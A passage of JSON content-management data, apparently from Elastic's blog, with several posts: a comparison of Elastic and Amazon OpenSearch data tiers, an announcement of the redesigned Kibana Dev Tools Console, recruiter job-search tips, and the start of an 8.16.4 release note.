on.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Archive","_metadata":{"uid":"cs442e531a438e5d88"},"header_style":"H3","paragraph_l10n":""}],"_metadata":{"uid":"csdb58c4d1b9f5067a"}}},{"image":{"image":{"uid":"bltd30965f59bde3d8f","_version":1,"created_by":"bltd9765be97bbed20c","updated_by":"bltd9765be97bbed20c","created_at":"2024-02-27T16:28:27.944Z","updated_at":"2024-02-27T16:28:27.944Z","content_type":"image/png","file_size":"229040","filename":"imagen_(3).png","title":"imagen_(3).png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-02-27T16:28:35.873Z","user":"bltd9765be97bbed20c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltd30965f59bde3d8f/65de0dabffa94a7c493d379a/imagen_(3).png"},"_metadata":{"uid":"cs1e200f95f4298898"},"caption_l10n":"","alt_text_l10n":"archive","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs5319d5c37b44d008"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eSnapshots are stored in a repository, which could be on different storage systems like a local filesystem or object storage (e.g., GCS, S3) and must be manually restored for data to be searchable.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Hardware profiles","_metadata":{"uid":"csae056debc837f8ef"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAnother important aspect to consider is the instance types used in each tier. It’s also important to note Elastic Cloud supports three major cloud providers (AWS, Google Cloud, and Microsoft Azure) with different hardware profiles on each. Amazon OpenSearch Service’s approach designates specific instances (like OR1 and Im4gn) to its service with particular software version requirements and restrictions on EBS volume support.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eBoth Amazon OpenSearch Service and Elastic Cloud on AWS utilize Graviton2 based instances, indicating a shared preference for the performance gains and cost efficiencies of AWS’s ARM-based chipsets. Elastic Cloud on AWS is less prescriptive about the exact use-cases for its instances, providing a selection that includes high compute with fast storage (Graviton2 instances) and a variety of more traditional choices (like C5d, M5d, etc.).\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Why does this matter?","_metadata":{"uid":"csba53991159edd02f"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eNaming conventions can be misleading, causing understandable confusion when trying to align business needs to data storage options among providers. Having a grasp on the actual capabilities of these tiers can help you make more informed and cost-effective decisions regarding data management.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThis breakdown is meant to dispel misconceptions brought about by the naming overlap in data tiers between \u003c/span\u003e\u003ca href=\"https://www.elastic.co/amazon-opensearch-service\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic and Amazon OpenSearch Service\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e. With this description of data tiers, you’ll be better positioned to organize your data strategically for performance and cost benefits. It’s critical to move beyond the names and understand the underlying mechanics of each tier to ensure your data strategy is both robust and efficient.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003ePlease also see the following studies: \u003c/span\u003e\u003ca href=\"https://www.elastic.co/learn/search/elasticsearch-opensearch-roi-infographic\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElasticsearch surpasses OpenSearch in cost efficiency\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e along with how \u003c/span\u003e\u003ca href=\"https://www.elastic.co/pdf/elastic-elasticsearch-outperforms-opensearch-while-using-fewer-resources.pdf\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElasticsearch outperforms OpenSearch while using fewer resources\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs8d0893217e804749"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs999b0c5accf08a5c"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs55c9c7bf8c04e1f3"}}}],"publish_date":"2024-01-18","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"Discover the key differences between Elastic and Amazon OpenSearch Service data tiers for smarter, cost-effective data management","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"blt3d820a0eae1c9158","ACL":{},"created_at":"2020-06-17T03:35:53.368Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2020-06-17T03:35:53.368Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.290Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"bltc3067ddccda555c1","ACL":{},"created_at":"2023-11-06T21:50:08.806Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elastic-cloud","label_l10n":"Elastic Cloud","tags":[],"title":"Elastic Cloud","updated_at":"2023-11-06T21:50:08.806Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.096Z","user":"blt4b2e1169881270a8"}}],"tags_industry":[],"tags_partner":[{"uid":"blt5b5a3dd3ee2ae4bd","_content_type_uid":"tags_partner"}],"tags_topic":[],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"bltcb543cd010a1e2a8","ACL":{},"created_at":"2020-06-17T03:33:30.831Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud","label_l10n":"Cloud","tags":[],"title":"Cloud","updated_at":"2020-07-06T22:20:17.019Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:21.552Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blt5869984fd229aa07","_version":1,"is_dir":false,"ACL":{},"content_type":"image/jpeg","created_at":"2024-01-17T21:09:45.364Z","created_by":"bltb6c155cd84fc0c1a","file_size":"93010","filename":"140254_-_(Semi-urgent)_Blog_header_image-_Elastic_vs_AmazoN_OPT_2_V1.jpg","parent_uid":null,"tags":[],"title":"140254_-_(Semi-urgent)_Blog_header_image-_Elastic_vs_AmazoN_OPT_2_V1.jpg","updated_at":"2024-01-17T21:09:45.364Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-01-18T15:00:00.879Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt5869984fd229aa07/65a84219bad37d91a59dfb87/140254_-_(Semi-urgent)_Blog_header_image-_Elastic_vs_AmazoN_OPT_2_V1.jpg"},"title":"What’s the difference? Elastic data tiers and Amazon OpenSearch Service tiers","title_l10n":"What’s the difference? Elastic data tiers and Amazon OpenSearch Service tiers","updated_at":"2025-02-13T18:40:21.613Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/elastic-data-tiers-amazon-opensearch-service-tiers-differences","publish_details":{"time":"2025-02-13T18:40:27.769Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltbdbbd1a4bbc35973","_version":3,"locale":"en-us","ACL":{},"abstract_l10n":"Take a deeper look into our new Dev Tools Console with Monaco-powered editing, improved UI, and new features like multilanguage request copying.","author":["bltdd1d8738e939ec45"],"category":["bltfaae4466058cc7d6"],"created_at":"2025-02-13T14:12:44.977Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csa33756e0494003f9"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe Dev Tools Console in Kibana has been an important feature for developers and operators who interact with Elasticsearch. In Kibana 8.16, we’re excited to unveil a major upgrade to the Console, bringing you a more modern and user-friendly experience. This update is a result of extensive user feedback, a vision to provide a seamless development environment, and the fact that Console has not been updated since its initial implementation — so it was time for a fresh, new look. Let’s dive into what’s new!\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs40c6abbd33b3cca8"}}},{"image":{"image":{"uid":"blte384265353f4c32c","_version":1,"title":"image4.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2025-02-13T14:13:11.242Z","updated_at":"2025-02-13T14:13:11.242Z","content_type":"image/png","file_size":"314382","filename":"image4.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2025-02-13T14:19:49.763Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blte384265353f4c32c/67adfdf7286df0705bf37640/image4.png"},"_metadata":{"uid":"cs9c026fbbae128381"},"caption_l10n":"","alt_text_l10n":"Dev Tools Console in Kibana","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"A 2-phase transformation","_metadata":{"uid":"cs59fabe0de96f6978"},"header_style":"H2","paragraph_l10n":""},{"title_l10n":"Phase 1: Migrating to the Monaco editor","_metadata":{"uid":"cscc9d25930fc1153a"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOne of the most notable changes in this release is the migration of the Console’s editor — for both input and output — from the Ace editor to the Monaco editor. If you’re familiar with VS Code, Monaco is the editor behind its success. This change was driven by Monaco's status as a modern, well-maintained editor. And it aligns with the broader effort to migrate all editors in Kibana from Ace to Monaco, ensuring consistency and a unified user experience across the platform.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Phase 2: UI enhancements","_metadata":{"uid":"csd05fc6b42befd2f2"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eTo complement the power of the Monaco editor, we revamped the Console’s UI to make it cleaner, more intuitive, and packed with new capabilities. Here are some key improvements:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eCopy requests in multiple languages:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Previously, Console only supported copying requests as cURL. Now, you can also copy requests in JavaScript and Python, enabling smoother integration with your preferred development environment.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"cs818fd3d61d5c4afc"}}},{"image":{"image":{"uid":"blt751068855135f031","_version":1,"title":"image6.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2025-02-13T14:13:21.569Z","updated_at":"2025-02-13T14:13:21.569Z","content_type":"image/png","file_size":"349148","filename":"image6.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2025-02-13T14:19:49.774Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt751068855135f031/67adfe01d91e1b0b40007f24/image6.png"},"_metadata":{"uid":"cseb4a2e0658dc6af3"},"caption_l10n":"","alt_text_l10n":"select a language","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs12d3d5910cfc2eec"},"header_style":"H2","paragraph_l10n":"\u003cul\u003e\u003cli\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eRedesigned toolbar:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e The toolbar now features clearer icons and tooltips alongside new functionalities, such as exporting requests to a file or importing files directly into the input editor.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"csd378c1ce3c53f2ed"}}},{"image":{"image":{"uid":"blt9e07094aae89e6ff","_version":1,"title":"image1.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2025-02-13T14:14:57.706Z","updated_at":"2025-02-13T14:14:57.706Z","content_type":"image/png","file_size":"31052","filename":"image1.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2025-02-13T14:19:49.848Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt9e07094aae89e6ff/67adfe6124d331316a7480c7/image1.png"},"_metadata":{"uid":"cs0d220c95cc608384"},"caption_l10n":"","alt_text_l10n":"toolbar","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs2d28b8d139648d27"},"header_style":"H2","paragraph_l10n":"\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eEnhanced panels:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e The input and output panels have been refreshed with a modern design and include additional buttons to clear the input and output effortlessly, streamlining your workflow.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eSimplified configurations: \u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAccess and adjust Console settings and variables more easily through an improved \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eConfigurations\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e tab, requiring fewer clicks to make changes.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"cs0d7841a450713e73"}}},{"image":{"image":{"uid":"blt0a4dd4da8cb97026","_version":1,"title":"image5.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2025-02-13T14:15:09.893Z","updated_at":"2025-02-13T14:15:09.893Z","content_type":"image/png","file_size":"225356","filename":"image5.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2025-02-13T14:19:49.858Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt0a4dd4da8cb97026/67adfe6d2cc2e35bd05dfd0d/image5.png"},"_metadata":{"uid":"csb2d5a2c850bdd8e0"},"caption_l10n":"","alt_text_l10n":"console settings","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs3aa05a14c1a354ca"},"header_style":"H2","paragraph_l10n":"\u003cul\u003e\u003cli\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eImproved history: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eThe History tab has a new and improved design with a Monaco output editor and the capability to directly add and run a request in the Console shell.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"cs784e7942a810dbbc"}}},{"image":{"image":{"uid":"bltb8dc701be078faef","_version":1,"title":"image3.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2025-02-13T14:15:22.951Z","updated_at":"2025-02-13T14:15:22.951Z","content_type":"image/png","file_size":"95105","filename":"image3.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2025-02-13T14:19:49.794Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltb8dc701be078faef/67adfe7a4808981324cb79a2/image3.png"},"_metadata":{"uid":"cs23db483f1bd51128"},"caption_l10n":"","alt_text_l10n":"history","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs3e661f4a45c80fb0"},"header_style":"H2","paragraph_l10n":"\u003cul\u003e\u003cli\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eImproved responsiveness: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eConsole now dynamically adjusts to smaller screen sizes by switching from a horizontal to a vertical layout.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"cs907c25865ef183c9"}}},{"image":{"image":{"uid":"blt4269b43a009f42cb","_version":1,"title":"image2.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2025-02-13T14:15:35.020Z","updated_at":"2025-02-13T14:15:35.020Z","content_type":"image/png","file_size":"193933","filename":"image2.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2025-02-13T14:19:49.868Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt4269b43a009f42cb/67adfe87286df09911f3764a/image2.png"},"_metadata":{"uid":"cs8592f7174f0a986d"},"caption_l10n":"","alt_text_l10n":"enter a new request","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"Why the updates matter","_metadata":{"uid":"csdc74f9252f961eac"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThese updates are more than just cosmetic; they’re also designed to enhance productivity, eliminate inefficiencies, and make the Dev Tools Console more enjoyable to use. Whether you’re crafting complex queries, debugging responses, or exploring Elasticsearch APIs, the new Console equips you with the tools to get the job done faster and with greater precision.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"What's next?","_metadata":{"uid":"cs40d995cef63cfd21"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe’re always listening to your feedback and exploring ways to make the Console even better. If you haven’t already, \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/kibana/current/upgrade.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eupgrade to Kibana 8.16+\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e and experience the new Dev Tools Console firsthand. We’d love to hear your thoughts as we continue to iterate and improve.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eStay tuned for more exciting updates. And as always, happy querying!\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs194c9b4dc68aff21"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs85f0d34d6746fe66"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs1c991043c532e101"}}}],"publish_date":"2025-02-13","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[],"tags_use_case":[],"thumbnail_image":{"uid":"blt8d4cb8d29127f92e","_version":1,"title":"139686 - Elastic - Headers - V1.jpg","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2025-02-13T14:12:43.045Z","updated_at":"2025-02-13T14:12:43.045Z","content_type":"image/jpeg","file_size":"180673","filename":"139686_-_Elastic_-_Headers_-_V1.jpg","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2025-02-13T14:19:49.783Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt8d4cb8d29127f92e/67adfddbd5c33d2e2bf0bae1/139686_-_Elastic_-_Headers_-_V1.jpg"},"title":"Introducing the new Dev Tools Console in Kibana","title_l10n":"Introducing the new Dev Tools Console in Kibana","updated_at":"2025-02-13T14:18:37.359Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/dev-tools-console-kibana","publish_details":{"time":"2025-02-13T14:19:49.450Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt80888c2d5367714f","_version":6,"locale":"en-us","ACL":{},"abstract_l10n":"We asked Elastic recruiters for their best tips on how to stand out in the application and interview process — and what they advise their candidates. Here’s what they had to say.","author":["blt7fc3768df8cad1f6"],"category":["bltc253e0851420b088"],"created_at":"2025-01-16T02:07:16.989Z","created_by":"blte369ea3bcd6ac892","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs03541018322bbb8f"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eNew year, new job. If you’re hoping to land a new role in 2025, January and February is the prime time to polish your resume and hone your interviewing skills.\u003cbr /\u003e\u003cbr /\u003eWe asked Elastic recruiters for their best tips on how to stand out in the application and interview process — and what they advise their candidates. Here’s what they had to say.\u003c/span\u003e\u003c/p\u003e\u003ch2\u003eCreate a detailed resume\u0026nbsp;\u003c/h2\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eDedicate time to creating a resume that is detailed without being lengthy.\u0026nbsp; Add bullet points for each job that you’ve had, highlighting your day-to-day experiences and your accomplishments, like quota achievements or impacts on a project — with numbers.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIt’s also important to tailor your resume for the specific job you’re applying for, says Charlie White, senior recruiter.\u003cbr /\u003e\u003cbr /\u003eCharlie recommends analyzing the job description before you apply to see if there are any key skills, tools, or experiences that are a requirement for the job. More often than not, there will be, so add those to your resume.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e“To go a step further, if you have the direct tool or experience they are looking for, be sure to add a specific bullet point on how you used/implemented it in your experience,” Charlie says. “Don’t just add it to your skills section. You want to showcase your abilities to give you the best chance possible of being shortlisted or picked for an interview.”\u003c/span\u003e\u003c/p\u003e\u003ch2\u003ePrepare an elevator pitch\u003c/h2\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eHave an elevator pitch or compelling story of your background ready to share with a recruiter or hiring manager.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIsam Nouidei, recruiter, field ops AMER, shares an example.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e“A strong candidate for a sales position can effectively convey their motivation by discussing what they admire about the company’s solutions and referencing specific use cases that align with their career aspirations. They should prepare examples from their past experiences, highlighting challenges they faced, the strategies they employed to overcome them, and the measurable results achieved against targets.”\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003ePreparing an elevator pitch will not only help you home in on the story you want to tell, but it also allows you to practice talking about yourself, your interests, and your achievements. Put together a few versions and share them with mentors, trusted coworkers, or friends for their feedback. When it’s finalized, practice saying it out loud so that when it comes time to talk to a recruiter or hiring manager, you’re confident and comfortable.\u003c/span\u003e\u003c/p\u003e\u003ch2\u003eCome with a positive attitude\u003c/h2\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eCandidates who stand out typically possess relevant experience, a positive attitude, and effective communication skills throughout the interview process, says Isam.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e“Showcasing a positive attitude is crucial; candidates can illustrate how they handle objections or navigate situations requiring them to learn new skills or turn a business around,” he says.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eShare stories of resilience and grit, Isam recommends, such as successfully addressing client concerns or adapting to market changes. These types of stories demonstrate determination and ability to thrive in challenging environments.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e“Aim to communicate clearly and concisely while demonstrating motivation and genuine interest.”\u003c/span\u003e\u003c/p\u003e\u003ch2\u003eSend a thank you note\u003c/h2\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe thank you note isn’t dead. In fact, sending a thank you note to your hiring team still goes a long way and sets you apart.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eYou would be amazed at how many candidates never follow up after an interview, Charlie\u0026nbsp; says.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e“Sending a personalized thank you to each interviewer and highlighting the aspects of the job that excite you the most not only reconfirms your interest in the role but also shows a great passion to join the team as well as displays a collaborative nature about you,” he says.\u003c/span\u003e\u003cbr /\u003e\u003cbr /\u003e\u003cbr /\u003e\u003cbr /\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003e\u003cstrong\u003eGet started on your 2025 job search. \u003c/strong\u003e\u003c/em\u003e\u003c/span\u003e\u003ca href=\"https://www.elastic.co/careers/?baymax=web\u0026elektra=culture-\"\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eBrowse open roles.\u003c/strong\u003e\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs0a3ce885a387dcea"}}}],"publish_date":"2025-01-16","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[{"uid":"blt6d563296d3ba4a70","_content_type_uid":"tags_culture"}],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[],"tags_use_case":[],"thumbnail_image":{"uid":"blt976458d281b37c84","_version":1,"title":"173436 - Recruiting tips D3 - 1.jpg","created_by":"blte369ea3bcd6ac892","updated_by":"blte369ea3bcd6ac892","created_at":"2025-02-12T19:18:27.548Z","updated_at":"2025-02-12T19:18:27.548Z","content_type":"image/jpeg","file_size":"166302","filename":"173436_-_Recruiting_tips_D3_-_1.jpg","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2025-02-12T19:21:15.571Z","user":"blte369ea3bcd6ac892","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt976458d281b37c84/67acf403a40f6603c2b31c28/173436_-_Recruiting_tips_D3_-_1.jpg"},"title":"Elastic recruiters reveal how to stand out in your job search","title_l10n":"Elastic recruiters reveal how to stand out in your job search","updated_at":"2025-02-12T19:20:06.678Z","updated_by":"blte369ea3bcd6ac892","url":"/blog/culture-elastic-recruiters-reveal-how-to-stand-out-job-search","publish_details":{"time":"2025-02-12T19:21:15.413Z","user":"blte369ea3bcd6ac892","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt382f640fe21e7f94","_version":2,"locale":"en-us","ACL":{},"abstract_l10n":"Read about the updates and bug fixes that have been included in this release.","author":["bltd4bc376d489a0c78"],"category":["bltfaae4466058cc7d6"],"created_at":"2025-02-10T23:37:27.775Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"Version 8.16.4 of the Elastic Stack was released today. We recommend you [upgrade to this latest version](https://www.elastic.co/downloads). We recommend 8.16.4 over the previous versions 8.16.3\n\nFor details of the issues that have been fixed and a full list of changes for each product in this version, please refer to [the release 